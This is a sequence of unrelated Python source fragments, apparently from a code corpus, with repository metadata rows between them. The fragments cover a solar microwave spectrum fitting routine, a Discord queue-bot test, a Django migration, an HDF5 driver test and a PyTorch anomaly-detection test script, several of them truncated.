libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'binaries/MWTransferArr.so')
if platform.system() == 'Windows':
libname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'binaries/MWTransferArr64.dll')
def mwspec2min_1src(params, freqghz, tb=None, tb_err=None, arcsec2cm=0.725e8, showplt=False):
# params are defined by lmfit.Paramters()
'''
params: parameters defined by lmfit.Paramters()
freqghz: frequencies in GHz
ssz: pixel size in arcsec
tb: reference brightness temperature in K
tb_err: uncertainties of reference brightness temperature in K
'''
from scipy import interpolate
GET_MW = gstools.initGET_MW(libname) # load the library
ssz = float(params['ssz'].value) # # source area in arcsec^2
depth = float(params['depth'].value) # total source depth in arcsec
Bmag = float(params['Bmag'].value) # magnetic field strength in G
Tth = float(params['Tth'].value) # thermal temperature in MK
nth = float(params['nth'].value) # thermal density in 1e10 cm^{-3}
nrlh = 10. ** float(params['lognrlh'].value) # total nonthermal density above 0.1 MeV
delta = float(params['delta'].value) # powerlaw index
theta = float(params['theta'].value) # viewing angle in degrees
Emin = float(params['Emin'].value) # low energy cutoff of nonthermal electrons in MeV
Emax = float(params['Emax'].value) # high energy cutoff of nonthermal electrons in MeV
E_hi = 0.1
nrl = nrlh * (Emin ** (1. - delta) - Emax * (1. - delta)) / (E_hi ** (1. - delta) - Emax ** (1. - delta))
Nf = 100 # number of frequencies
NSteps = 1 # number of nodes along the line-of-sight
N_E = 15 # number of energy nodes
N_mu = 15 # number of pitch-angle nodes
Lparms = np.zeros(11, dtype='int32') # array of dimensions etc.
Lparms[0] = NSteps
Lparms[1] = Nf
Lparms[2] = N_E
Lparms[3] = N_mu
Rparms = np.zeros(5, dtype='double') # array of global floating-point parameters
Rparms[0] = ssz * arcsec2cm ** 2 # Area, cm^2
# Rparms[0] = 1e20 # area, cm^2
Rparms[1] = 1e9 # starting frequency to calculate spectrum, Hz
Rparms[2] = 0.02 # logarithmic step in frequency
Rparms[3] = 12 # f^C
Rparms[4] = 12 # f^WH
ParmLocal = np.zeros(24, dtype='double') # array of voxel parameters - for a single voxel
ParmLocal[0] = depth * arcsec2cm / NSteps # voxel depth, cm
ParmLocal[1] = Tth * 1e6 # T_0, K
ParmLocal[2] = nth * 1e10 # n_0 - thermal electron density, cm^{-3}
ParmLocal[3] = Bmag # B - magnetic field, G
Parms = np.zeros((24, NSteps), dtype='double', order='F') # 2D array of input parameters - for multiple voxels
for i in range(NSteps):
Parms[:, i] = ParmLocal # most of the parameters are the same in all voxels
# if NSteps > 1:
# Parms[4, i] = 50.0 + 30.0 * i / (NSteps - 1) # the viewing angle varies from 50 to 80 degrees along the LOS
# else:
# Parms[4, i] = 50.0 # the viewing angle varies from 50 to 80 degrees along the LOS
Parms[4, i] = theta
# parameters of the electron distribution function
n_b = nrl # n_b - nonthermal electron density, cm^{-3}
mu_c = np.cos(np.pi * 70 / 180) # loss-cone boundary
dmu_c = 0.2 # Delta_mu
E_arr = np.logspace(np.log10(Emin), np.log10(Emax), N_E, dtype='double') # energy grid (logarithmically spaced)
mu_arr = np.linspace(-1.0, 1.0, N_mu, dtype='double') # pitch-angle grid
f0 = np.zeros((N_E, N_mu), dtype='double') # 2D distribution function array - for a single voxel
# computing the distribution function (equivalent to PLW & GLC)
A = n_b / (2.0 * np.pi) * (delta - 1.0) / (Emin ** (1.0 - delta) - Emax ** (1.0 - delta))
B = 0.5 / (mu_c + dmu_c * np.sqrt(np.pi) / 2 * math.erf((1.0 - mu_c) / dmu_c))
for i in range(N_E):
for j in range(N_mu):
amu = abs(mu_arr[j])
f0[i, j] = A * B * E_arr[i] ** (-delta) * (1.0 if amu < mu_c else np.exp(-((amu - mu_c) / dmu_c) ** 2))
f_arr = np.zeros((N_E, N_mu, NSteps), dtype='double',
order='F') # 3D distribution function array - for multiple voxels
for k in range(NSteps):
f_arr[:, :, k] = f0 # electron distribution function is the same in all voxels
RL = np.zeros((7, Nf), dtype='double', order='F') # input/output array
# calculating the emission for array distribution (array -> on)
res = GET_MW(Lparms, Rparms, Parms, E_arr, mu_arr, f_arr, RL)
if res:
# retrieving the results
f = RL[0]
I_L = RL[5]
I_R = RL[6]
if showplt:
import matplotlib.pyplot as plt
fig, ax = plt.subplots(1, 1)
ax.plot(f, I_L + I_R)
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_title('Total intensity (array)')
ax.set_xlabel('Frequency, GHz')
ax.set_ylabel('Intensity, sfu')
flx_model = I_L + I_R
flx_model = np.nan_to_num(flx_model) + 1e-11
logf = np.log10(f)
logflx_model = np.log10(flx_model)
logfreqghz = np.log10(freqghz)
interpfunc = interpolate.interp1d(logf, logflx_model, kind='linear')
logmflx = interpfunc(logfreqghz)
mflx = 10. ** logmflx
mtb = sfu2tb(np.array(freqghz) * 1.e9, mflx, ssz)
else:
print("Calculation error!")
if tb is None:
return mtb
if tb_err is None:
# return mTb - Tb
return mtb - tb
# wt = 1./flx_err
# wt = 1./(Tb_err/Tb/np.log(10.))
# residual = np.abs((logmTb - np.log10(Tb))) * wt
# residual = np.abs((mflx - flx)) * wt
residual = (mtb - tb) / tb_err
return residual
| 40.784024 | 145 | 0.551904 |
4685248be49c1c014500014593ebd58e99994652 | 1,496 | py | Python | msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | bfb136b6105df84fb6c1c89cc595bf9e9f22c5fe | [
"MIT"
] | 10 | 2015-12-04T07:43:11.000Z | 2021-01-23T00:44:56.000Z | msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | bfb136b6105df84fb6c1c89cc595bf9e9f22c5fe | [
"MIT"
] | 200 | 2015-02-11T05:41:57.000Z | 2015-11-13T03:47:25.000Z | msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | bfb136b6105df84fb6c1c89cc595bf9e9f22c5fe | [
"MIT"
] | 6 | 2015-10-02T18:01:09.000Z | 2021-01-23T00:44:58.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
| 36.487805 | 114 | 0.556818 |
4685622823bb3cb792b6697fa854e6d940a37ece | 7,412 | py | Python | test/test_check_alert.py | russ-lewis/cs120-queuebot | 6b121ef9b0d7db7bbb1810f71129d995ce6a1659 | [
"MIT"
] | null | null | null | test/test_check_alert.py | russ-lewis/cs120-queuebot | 6b121ef9b0d7db7bbb1810f71129d995ce6a1659 | [
"MIT"
] | null | null | null | test/test_check_alert.py | russ-lewis/cs120-queuebot | 6b121ef9b0d7db7bbb1810f71129d995ce6a1659 | [
"MIT"
] | 1 | 2021-05-18T02:32:54.000Z | 2021-05-18T02:32:54.000Z | import io
import sys
import unittest
import asyncio
import random
from contextlib import redirect_stdout
from .utils import *
from queuebot import QueueBot, QueueConfig, DiscordUser
config = {
"SECRET_TOKEN": "NOONEWILLEVERGUESSTHISSUPERSECRETSTRINGMWAHAHAHA",
"TA_ROLES": ["UGTA"],
"LISTEN_CHANNELS": ["join-queue"],
"CHECK_VOICE_WAITING": "False",
"VOICE_WAITING": "waiting-room",
"ALERT_ON_FIRST_JOIN": "True",
"VOICE_OFFICES": ["Office Hours Room 1", "Office Hours Room 2", "Office Hours Room 3"],
"ALERTS_CHANNEL": "queue-alerts",
}
config = QueueConfig(config, test_mode=True)
# TODO Comment each test case
if __name__ == '__main__':
unittest.main()
| 34.314815 | 91 | 0.625472 |
4685d4b1728860e781a678cd76d788dda6fe260b | 236 | py | Python | iam/__init__.py | dataday/aws-utilities-sdk | 7b1236f27a27e2830ccbbf905bbc05f864a1aecf | [
"MIT"
] | null | null | null | iam/__init__.py | dataday/aws-utilities-sdk | 7b1236f27a27e2830ccbbf905bbc05f864a1aecf | [
"MIT"
] | null | null | null | iam/__init__.py | dataday/aws-utilities-sdk | 7b1236f27a27e2830ccbbf905bbc05f864a1aecf | [
"MIT"
] | null | null | null | """
.. module:: aws_utilities_cli.iam
:platform: OS X
:synopsis: Small collection of utilities that
use the Amazon Web Services (AWS) SDK
.. moduleauthor:: dataday
"""
__all__ = ['generate_identity', 'generate_policy']
| 23.6 | 50 | 0.686441 |
46869ee7c4058bcc60c1e873b09ca6bac3bb10d7 | 2,556 | py | Python | tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 114d8626b824b9a31af50a482afc07ab7121862b | [
"Apache-2.0"
] | null | null | null | tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 114d8626b824b9a31af50a482afc07ab7121862b | [
"Apache-2.0"
] | null | null | null | tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 114d8626b824b9a31af50a482afc07ab7121862b | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tests.common.tensorio import compare_tensor
from tests.common.test_op import triangle
from akg.utils import kernel_exec as utils
from tests.common.gen_random import random_gaussian
| 35.5 | 114 | 0.711659 |
4686dbf11ea2488f7a45d2ed0c1748432a5a0064 | 394 | py | Python | profiles/migrations/0018_auto_20180514_2106.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | 2 | 2018-12-03T09:19:31.000Z | 2020-02-11T15:32:12.000Z | {{cookiecutter.project_slug}}/profiles/migrations/0018_auto_20180514_2106.py | brentfraser/cookiecutter-geopaparazzi-server | f9cd705991879deac67365007e9589142afc09bf | [
"BSD-3-Clause"
] | 2 | 2019-02-20T17:50:55.000Z | 2019-02-21T15:19:51.000Z | profiles/migrations/0018_auto_20180514_2106.py | GeoAnalytic-code/geotabloid | af017d470ef4553d5fbd24d865cb22ca643fd999 | [
"MIT"
] | 2 | 2018-10-19T17:07:01.000Z | 2021-01-13T06:54:55.000Z | # Generated by Django 2.0.3 on 2018-05-14 21:06
from django.db import migrations, models
| 20.736842 | 58 | 0.598985 |
46873638ac399bb3c28bf800bc92bbfd39940934 | 15,189 | py | Python | orio/main/tuner/tuner.py | parsabee/Orio | 64de0f7ee422483b60a9f02793472e20e864aa08 | [
"MIT"
] | 24 | 2015-01-26T03:14:19.000Z | 2021-09-27T23:10:12.000Z | orio/main/tuner/tuner.py | parsabee/Orio | 64de0f7ee422483b60a9f02793472e20e864aa08 | [
"MIT"
] | 30 | 2015-04-17T18:14:27.000Z | 2021-05-30T15:01:47.000Z | orio/main/tuner/tuner.py | parsabee/Orio | 64de0f7ee422483b60a9f02793472e20e864aa08 | [
"MIT"
] | 20 | 2015-02-11T08:20:19.000Z | 2022-01-15T17:55:00.000Z | #
# The tuner class to initiate the empirical performance tuning process
#
import re, sys, os
from orio.main.util.globals import *
import orio.main.dyn_loader, orio.main.tspec.tspec, orio.main.tuner.ptest_codegen, orio.main.tuner.ptest_driver
#--------------------------------------------------
# the name of the module containing various search algorithms
SEARCH_MOD_NAME = 'orio.main.tuner.search'
#--------------------------------------------------
| 43.397143 | 169 | 0.55448 |
46882caba8a1bc1cb57f8753adac56b5f9b622b8 | 1,862 | py | Python | verify_data.py | goowell/DrAdvice | d1f9d70671500599b3a36eb9c83390e39c521d25 | [
"MIT"
] | null | null | null | verify_data.py | goowell/DrAdvice | d1f9d70671500599b3a36eb9c83390e39c521d25 | [
"MIT"
] | null | null | null | verify_data.py | goowell/DrAdvice | d1f9d70671500599b3a36eb9c83390e39c521d25 | [
"MIT"
] | null | null | null | from transformer import *
from logger import logger
def verify_data(collection):
'verify the data format is correct or not.'
for d in collection.find():
info = d.get('d').get('info')
if len(info) <12 and info[0] != '1':
logger.error('invalid patient info:' + d['_id']+str(info))
if len(d.get('d').get('doctor_advice')) == 0:
logger.error('invalid doctor advice:' + d['_id'])
else:
has_long = False
has_short = False
for a in d.get('d').get('doctor_advice'):
if len(a) != 18:
logger.error('invalid doctor advice:' + d['_id'])
logger.error("invalid doctor advice: " + a)
if a[3] == '':
has_long = True
else:
has_short = True
if not (has_long and has_short):
logger.error('invalid doctor advice: ' + d['_id'] + ', long/short: {}/{}'.format(has_long, has_short) )
def get_info(collection):
'count PE'
for d in collection.find():
if len(d.get('d').get('doctor_advice')) == 0:
print('invalid doctor advice:' + d['_id'])
else:
one_p = split_all_ad(d)
print(one_p)
break
def main():
'main entry'
from datetime import datetime
from db import paients_source
start = datetime.now()
print('hello..')
# verify_data(paients_source)
# get_info(collection)
find_missing()
print(datetime.now() - start)
if __name__ == '__main__':
main() | 29.09375 | 119 | 0.538131 |
46885ee1267724c58d93c90bd0626ea4f768c7c7 | 1,904 | py | Python | jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 983159f52784e3d9dfd8e9957c5f8ca18e64f934 | [
"Apache-2.0"
] | 15 | 2020-06-11T02:20:26.000Z | 2022-03-09T07:18:23.000Z | jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 983159f52784e3d9dfd8e9957c5f8ca18e64f934 | [
"Apache-2.0"
] | 4 | 2021-01-20T03:24:23.000Z | 2021-11-01T05:33:38.000Z | jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 983159f52784e3d9dfd8e9957c5f8ca18e64f934 | [
"Apache-2.0"
] | 6 | 2020-06-24T03:28:58.000Z | 2021-10-01T16:04:11.000Z | #!/usr/bin/env python
import os
import re
import subprocess
import sys
# version -> classifier
# '' means default classifier
cuda_vers = {
'11.2': ['cuda11', '']
}
def check_classifier(classifier):
'''
Check the mapping from cuda version to jar classifier.
Used by maven build.
'''
cu_ver = detect_cuda_ver()
classifier_list = cuda_vers[cu_ver]
if classifier not in classifier_list:
raise Exception("Jar classifier '{}' mismatches the 'nvcc' version {} !".format(classifier, cu_ver))
def get_supported_vers():
'''
Get the supported cuda versions.
'''
return cuda_vers.keys()
def get_supported_vers_str():
'''
Get the supported cuda versions and join them as a string.
Used by shell script.
'''
return ' '.join(cuda_vers.keys())
def detect_cuda_ver():
'''
Detect the cuda version from current nvcc tool.
'''
nvcc_ver_bin = subprocess.check_output('nvcc --version', shell=True)
nvcc_ver = re.search('release ([.0-9]+), V([.0-9]+)', str(nvcc_ver_bin)).group(1)
if nvcc_ver in get_supported_vers():
return nvcc_ver
else:
raise Exception("Unsupported cuda version: {}, Please check your 'nvcc' version.".format(nvcc_ver))
if __name__ == "__main__":
num_args = len(sys.argv)
action = sys.argv[1].lower() if num_args > 1 else 'l'
if action =='c':
classifier = sys.argv[2].lower() if num_args > 2 else ''
check_classifier(classifier)
elif action == 'd':
print(detect_cuda_ver())
elif action == 'g':
print(get_classifier())
elif action == 'l':
print(get_supported_vers_str())
else:
print("Unsupported action: " + action)
| 25.386667 | 108 | 0.644958 |
4688b12d1b22b922d562bb53aed309b70230470c | 294 | py | Python | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-03-29 19:11
from django.db import migrations
| 17.294118 | 49 | 0.602041 |
4689c871990ae00114397708dbcc29fc3f6a6ac6 | 5,087 | py | Python | support/models.py | gurupratap-matharu/django-tickets-app | 8200af606e382f8806511c318961589f34375cdf | [
"MIT"
] | 1 | 2020-10-16T16:37:04.000Z | 2020-10-16T16:37:04.000Z | support/models.py | gurupratap-matharu/django-tickets-app | 8200af606e382f8806511c318961589f34375cdf | [
"MIT"
] | null | null | null | support/models.py | gurupratap-matharu/django-tickets-app | 8200af606e382f8806511c318961589f34375cdf | [
"MIT"
] | null | null | null | import pytz
from datetime import date, time, datetime, timedelta
from django.core.exceptions import ValidationError
from django.db import models
START_HOUR = 9
END_HOUR = 18
workingHours = END_HOUR - START_HOUR
def findExpiryDate(sla):
"""
Finds the expiry date for a ticket based on
1. Severity of the ticket
2. Date of issue
"""
now = datetime.now()
flag = 1
# if ticket is received today between 00:00 hours to Start_Hour
# we reset the flag
if now.hour < START_HOUR:
flag = 0
# if ticket is received today between office hours then
# we simply deduct working hours left today from sla
if START_HOUR < now.hour < END_HOUR:
hoursLeftToday = END_HOUR - sla
sla -= hoursLeftToday
tomorrow = date.today() + timedelta(days=flag)
shiftTime = time(START_HOUR,0,0)
dt = datetime.combine(tomorrow, shiftTime, pytz.utc)
dt = adjust_Weekends_And_Holidays(dt) # adjust incase we hit a weekend
# now we find the office days and office hours
# we would need to complete the sla
days, hours = divmod(sla, workingHours)
dt += timedelta(hours=hours)
dt = adjust_Weekends_And_Holidays(dt, days=days) # adjust incase we hit a weekend
return dt
def isWeekend(dt):
"""Finds if a date lies on a weekend or not. Returns a boolean"""
if 0 < dt.weekday() < 6:
return False
else:
return True
def isHoliday(dt):
"""Finds if a date lies on a holiday or not. Returns a boolean"""
return Holiday.objects.filter(day=dt.date()).exists()
def adjust_Weekends_And_Holidays(dt, days=0):
"""
Adjust the datetime to a future datetime accomodating for
1. days needed
2. skipping Weekends
"""
while isWeekend(dt) or isHoliday(dt):
dt += timedelta(days=1)
while days:
dt += timedelta(days=1)
if isWeekend(dt) or isHoliday(dt):
continue
else:
days -= 1
return dt
| 30.279762 | 98 | 0.649892 |
4689fd0a503a48da1fc4fb1000e346ebf2f7be93 | 605 | py | Python | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 7 | 2020-05-07T08:13:44.000Z | 2021-12-17T07:33:51.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 17 | 2019-11-29T23:17:26.000Z | 2020-12-20T15:47:17.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 1 | 2020-12-17T22:44:21.000Z | 2020-12-17T22:44:21.000Z | from hypothesis import given
from tests.port_tests.hints import (PortedBoundingBox,
PortedPoint)
from tests.utils import equivalence
from . import strategies
| 31.842105 | 77 | 0.707438 |
468a1af4f4a7334446b0e0152db92174a4f3295b | 424 | py | Python | test/conftest.py | alexandonian/lightning | 90350fd454cd7a51c35adadf5b9753868ac6dccd | [
"Apache-2.0"
] | null | null | null | test/conftest.py | alexandonian/lightning | 90350fd454cd7a51c35adadf5b9753868ac6dccd | [
"Apache-2.0"
] | null | null | null | test/conftest.py | alexandonian/lightning | 90350fd454cd7a51c35adadf5b9753868ac6dccd | [
"Apache-2.0"
] | null | null | null | import pytest
# import station
| 23.555556 | 66 | 0.625 |
468ce700bfaf82c4969d9da9bf954d79c010ee00 | 7,960 | py | Python | pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 018d3eed8d93ff32e86c912e68045c7a3f4ed0b7 | [
"BSD-3-Clause"
] | 1 | 2020-07-24T10:59:17.000Z | 2020-07-24T10:59:17.000Z | pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 018d3eed8d93ff32e86c912e68045c7a3f4ed0b7 | [
"BSD-3-Clause"
] | null | null | null | pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 018d3eed8d93ff32e86c912e68045c7a3f4ed0b7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import logging
import torch.nn as nn
from fairseq import checkpoint_utils
from fairseq.models import BaseFairseqModel, register_model
from pytorch_translate import rnn
from pytorch_translate.rnn import (
LSTMSequenceEncoder,
RNNDecoder,
RNNEncoder,
RNNModel,
base_architecture,
)
from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask
logger = logging.getLogger(__name__)
| 38.829268 | 91 | 0.650377 |
468d721e5802a550fe36c1b0efccab7310faf51c | 697 | py | Python | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | from ._utils import construct_dia, construct_hth, construct_sampling_matrix
from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering
from .ess import ess, ess_sampling, recon_ess
from .fastgsss import fastgsss, recon_fastssss
from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs
__all__ = [
"ess",
"ess_sampling",
"bsgda",
"computing_sets",
"solving_set_covering",
"cheby_coeff4ideal_band_pass",
"estimate_lk",
"rsbs",
"fastgsss",
# reconstruction
"recon_fastssss",
"recon_bsgda",
"recon_ess",
"recon_rsbs",
# utils
"construct_sampling_matrix",
"construct_hth",
"construct_dia",
]
| 25.814815 | 76 | 0.71736 |
468df8250e372c77ba85fdae3eaf93df4bca1fda | 3,382 | py | Python | h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 1 | 2022-03-15T06:08:14.000Z | 2022-03-15T06:08:14.000Z | h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 58 | 2021-10-01T12:43:37.000Z | 2021-12-08T22:58:43.000Z | h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | null | null | null | import tempfile
import os
import sys
sys.path.insert(1,"../../")
import h2o
from h2o.estimators import H2OGeneralizedLinearEstimator, H2OGenericEstimator
from tests import pyunit_utils
from tests.testdir_generic_model import compare_output, Capturing, compare_params
if __name__ == "__main__":
pyunit_utils.standalone_test(mojo_model_test_binomial)
pyunit_utils.standalone_test(mojo_model_test_multinomial)
pyunit_utils.standalone_test(mojo_model_test_regression)
pyunit_utils.standalone_test(mojo_model_test_ordinal)
else:
mojo_model_test_binomial()
mojo_model_test_multinomial()
mojo_model_test_regression()
mojo_model_test_ordinal()
| 46.328767 | 136 | 0.77262 |
468f2faee1688669d20b891ff6fb1ee641d68824 | 9,160 | py | Python | test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | aa6ece402c2e3e83cae102f04ffc83f9e2421bf3 | [
"Apache-2.0"
] | 35 | 2015-12-03T16:46:11.000Z | 2022-01-19T10:50:35.000Z | test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | aa6ece402c2e3e83cae102f04ffc83f9e2421bf3 | [
"Apache-2.0"
] | 57 | 2015-12-01T00:34:39.000Z | 2022-03-25T12:00:50.000Z | test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | aa6ece402c2e3e83cae102f04ffc83f9e2421bf3 | [
"Apache-2.0"
] | 64 | 2016-04-24T00:22:43.000Z | 2021-08-06T09:29:38.000Z | # (c) Copyright 2015 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test base class of 3PAR Client."""
import os
import sys
import unittest
import subprocess
import time
import inspect
from pytest_testconfig import config
import datetime
from functools import wraps
from hpe3parclient import client, file_client
TIME = datetime.datetime.now().strftime('%H%M%S')
try:
# For Python 3.0 and later
from urllib.parse import urlparse
except ImportError:
# Fall back to Python 2's urllib2
from urlparse import urlparse
| 37.235772 | 78 | 0.533188 |
468fc07953c8147b25a2f944027c5638901e823c | 4,452 | py | Python | test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | b8b1181d951cf8fa76fe0db9e5ea192dad5fb186 | [
"Apache-2.0"
] | null | null | null | test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | b8b1181d951cf8fa76fe0db9e5ea192dad5fb186 | [
"Apache-2.0"
] | null | null | null | test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | b8b1181d951cf8fa76fe0db9e5ea192dad5fb186 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Driver HDF5 """
import os
import pathlib
import shutil
import tempfile
import unittest
import warnings
from test import QiskitNatureTestCase
from test.drivers.second_quantization.test_driver import TestDriver
from qiskit_nature.drivers.second_quantization import HDF5Driver
from qiskit_nature.drivers import QMolecule
from qiskit_nature.properties.second_quantization.electronic import ElectronicStructureDriverResult
if __name__ == "__main__":
unittest.main()
| 39.75 | 99 | 0.655885 |
469076a38899f95c1e7c8c2bdfb61492327f8f5d | 11,269 | py | Python | 01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 47b621e6abd0502fed2123c31c61b081bce5c223 | [
"MIT"
] | null | null | null | 01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 47b621e6abd0502fed2123c31c61b081bce5c223 | [
"MIT"
] | null | null | null | 01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 47b621e6abd0502fed2123c31c61b081bce5c223 | [
"MIT"
] | null | null | null | ########################################################################
# import default libraries
########################################################################
import os
import csv
import sys
import gc
########################################################################
########################################################################
# import additional libraries
########################################################################
import numpy as np
import scipy.stats
import torch
import torch.nn as nn
# from import
from tqdm import tqdm
from sklearn import metrics
try:
from sklearn.externals import joblib
except:
import joblib
# original lib
import common as com
from pytorch_model import AutoEncoder
########################################################################
########################################################################
# load parameter.yaml
########################################################################
param = com.yaml_load()
#######################################################################
########################################################################
# output csv file
########################################################################
########################################################################
########################################################################
# main 01_test.py
########################################################################
if __name__ == "__main__":
####################################################################
# set device
####################################################################
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device : {}".format(device))
####################################################################
# check mode
# "development": mode == True
# "evaluation": mode == False
mode = com.command_line_chk()
if mode is None:
sys.exit(-1)
# make output result directory
os.makedirs(param["result_directory"], exist_ok=True)
# load base directory
dirs = com.select_dirs(param=param, mode=mode)
# initialize lines in csv for AUC and pAUC
csv_lines = []
if mode:
performance_over_all = []
# loop of the base directory
for idx, target_dir in enumerate(dirs):
print("\n===========================")
print("[{idx}/{total}] {target_dir}".format(target_dir=target_dir, idx=idx+1, total=len(dirs)))
machine_type = os.path.split(target_dir)[1]
print("============== MODEL LOAD ==============")
# load model file
model_file = "{model}/model_{machine_type}.hdf5".format(model=param["model_directory"],
machine_type=machine_type)
if not os.path.exists(model_file):
com.logger.error("{} model not found ".format(machine_type))
sys.exit(-1)
input_channel = param["feature"]["n_mels"] * param["feature"]["n_frames"]
model = AutoEncoder(input_channel).to(device)
model.eval()
if device.type == "cuda":
model.load_state_dict(torch.load(model_file))
elif device.type == "cpu":
model.load_state_dict(torch.load(model_file, map_location=torch.device("cpu")))
# load anomaly score distribution for determining threshold
score_distr_file_path = "{model}/score_distr_{machine_type}.pkl".format(model=param["model_directory"],
machine_type=machine_type)
shape_hat, loc_hat, scale_hat = joblib.load(score_distr_file_path)
# determine threshold for decision
decision_threshold = scipy.stats.gamma.ppf(q=param["decision_threshold"], a=shape_hat, loc=loc_hat, scale=scale_hat)
if mode:
# results for each machine type
csv_lines.append([machine_type])
csv_lines.append(["section", "domain", "AUC", "pAUC", "precision", "recall", "F1 score"])
performance = []
dir_names = ["source_test", "target_test"]
for dir_name in dir_names:
#list machine id
section_names = com.get_section_names(target_dir, dir_name=dir_name)
for section_name in section_names:
# load test file
files, y_true = com.file_list_generator(target_dir=target_dir,
section_name=section_name,
dir_name=dir_name,
mode=mode)
# setup anomaly score file path
anomaly_score_csv = "{result}/anomaly_score_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
machine_type=machine_type,
section_name=section_name,
dir_name=dir_name)
anomaly_score_list = []
# setup decision result file path
decision_result_csv = "{result}/decision_result_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
machine_type=machine_type,
section_name=section_name,
dir_name=dir_name)
decision_result_list = []
print("\n============== BEGIN TEST FOR A SECTION ==============")
y_pred = [0. for k in files]
for file_idx, file_path in tqdm(enumerate(files), total=len(files)):
try:
data = com.file_to_vectors(file_path,
n_mels=param["feature"]["n_mels"],
n_frames=param["feature"]["n_frames"],
n_fft=param["feature"]["n_fft"],
hop_length=param["feature"]["hop_length"],
power=param["feature"]["power"])
except:
com.logger.error("File broken!!: {}".format(file_path))
data = torch.tensor(data, dtype=torch.float32).to(device)
reconst = model(data)
mseloss = nn.functional.mse_loss(data.detach(), reconst.detach())
